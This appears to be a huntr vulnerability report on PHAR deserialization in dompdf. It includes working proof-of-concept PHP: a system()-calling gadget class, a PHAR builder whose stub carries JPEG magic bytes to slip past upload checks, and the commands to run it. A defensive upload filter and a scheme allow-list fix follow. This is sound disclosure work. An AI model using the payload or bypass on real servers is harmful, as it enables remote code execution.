huntr 0BDDDC12-FF67-4815-AB9F-6011A974F48E
Reported by haxatron (www.huntr.dev) in dompdf/dompdf
Sep 20, 2021 - 4:08 p.m.

Description

dompdf is vulnerable to PHAR deserialization because it does not check the scheme of an image source before passing it to file_get_contents(). If an attacker can upload a file of any type to the server, they can reference the uploaded file through the phar:// stream wrapper; PHP then unserializes the PHAR's metadata and instantiates arbitrary PHP objects. This can lead to remote code execution, especially when dompdf is used with frameworks that have documented POP chains (such as Laravel) or alongside vulnerable developer code.

Note that this applies to PHP 7 and earlier: since PHP 8.0, PHAR metadata is no longer unserialized automatically when an archive is opened through the phar:// wrapper, so the proof of concept below must be run under PHP 7.

Proof of Concept

  1. Set up the following code in /var/www/html: vuln.php represents our use of dompdf functions and phar-poc.php represents code with a vulnerable POP chain.
// vuln.php
<?php
// Include autoloader
require_once 'dompdf/autoload.inc.php';

// Include vulnerable objects
include("phar-poc.php");

// Reference the Dompdf namespace
use Dompdf\Dompdf;
use Dompdf\Options;

$options = new Options();
$options->set('isRemoteEnabled', true);
$dompdf = new Dompdf($options);

// Load HTML content. The src value was not preserved on this page; it is
// assumed here to be the phar:// wrapper pointing at the PHAR generated in
// step 2 (test.phar, written to the same directory)
$dompdf->loadHtml('<img src="phar://test.phar">');
// (Optional) Setup the paper size and orientation
$dompdf->setPaper('A4', 'landscape');

// Render the HTML as PDF; this is where the image source reaches file_get_contents()
$dompdf->render();

// Output the generated PDF to Browser
//$dompdf->stream();

?>
// phar-poc.php
<?php

// Stand-in for a gadget class: attacker-controlled $data is executed when the
// unserialized object is destroyed
class AnyClass {
        public $data = null;
        public function __construct($data) {
                $this->data = $data;
        }

        function __destruct() {
                system($this->data);
        }
}
  2. As an attacker, we generate our PHAR payload using the following exploit script:
// create_phar.php
<?php

// Same class name and layout as the gadget on the target, so the serialized
// metadata maps onto it when unserialized
class AnyClass {
        public $data = null;
        public function __construct($data) {
                $this->data = $data;
        }

        function __destruct() {
                system($this->data);
        }
}

// create new Phar
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
// Stub begins with JPEG magic bytes so the file also passes naive image checks
$phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");

// add object of any class as meta data
$object = new AnyClass('whoami');
$phar->setMetadata($object);
$phar->stopBuffering();
  3. Generate the PHAR with:
php --define phar.readonly=0 create_phar.php

then execute vuln.php with php vuln.php; the output of whoami shows that the gadget's __destruct() ran.

Note that after generating the PHAR, an attacker can rename it to any filename or extension: renaming test.phar to test.png bypasses a developer's file extension check, and because the stub above starts with JPEG magic bytes a naive magic-byte check passes as well. The attacker then specifies phar://test.png in the src attribute; the phar:// wrapper ignores the extension and parses the archive from its content.
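Because the extension and the leading magic bytes are both attacker-controlled, an upload filter has to look at the content. The following is an added example, not code from the original report or from dompdf: it rejects any upload that contains a PHAR stub token and then requires PHP's image parser to recognize the file. The function names and the constructed sample files are this example's own assumptions.

```php
<?php
// Added example, not part of the original report or of dompdf.

// Every PHAR carries a stub ending in __HALT_COMPILER(); PHP locates the
// archive manifest by searching the file for this token, so a PHAR cannot
// omit it whatever bytes precede it.
const PHAR_STUB_TOKEN = '__HALT_COMPILER';

function looks_like_phar(string $bytes): bool
{
    // Case-insensitive on purpose: PHP keywords are case-insensitive.
    return stripos($bytes, PHAR_STUB_TOKEN) !== false;
}

function upload_is_acceptable_image(string $path): bool
{
    $bytes = @file_get_contents($path);
    if ($bytes === false) {
        return false;
    }
    // Reject any file containing a PHAR stub, regardless of extension or
    // leading magic bytes (the report's stub starts with a JPEG signature).
    if (looks_like_phar($bytes)) {
        return false;
    }
    // Then require that PHP's image parser actually recognizes the file.
    return @getimagesize($path) !== false;
}

// Demonstration on constructed inputs written to the temp directory.
$dir = sys_get_temp_dir();
$fake = $dir . '/upload1.png';
// Same stub shape as the report's PHAR: JPEG magic followed by the PHP stub.
file_put_contents($fake, "\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>\r\n");
$real = $dir . '/upload2.png';
// Constructed 1x1 PNG.
file_put_contents($real, base64_decode(
    'iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg=='
));
foreach ([$fake, $real] as $f) {
    printf("%s: %s\n", basename($f), upload_is_acceptable_image($f) ? 'accepted' : 'rejected');
}
```

This is defence in depth for the upload path only; it does not fix the root cause, which is that dompdf hands an unchecked scheme to file_get_contents(), and it does nothing against a PHAR that reaches the server by some route other than the filtered upload.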

Impact

This vulnerability can lead to remote code execution when dompdf is used with frameworks or developer code that contain vulnerable POP chains.

Recommended Fix:

Validate the scheme of every image source before it reaches file_get_contents(): allow only http:// and https:// (and only when isRemoteEnabled is set) plus local paths under the configured base directory, and reject phar:// and every other stream wrapper. An allow-list of schemes is preferable to filtering phar:// alone.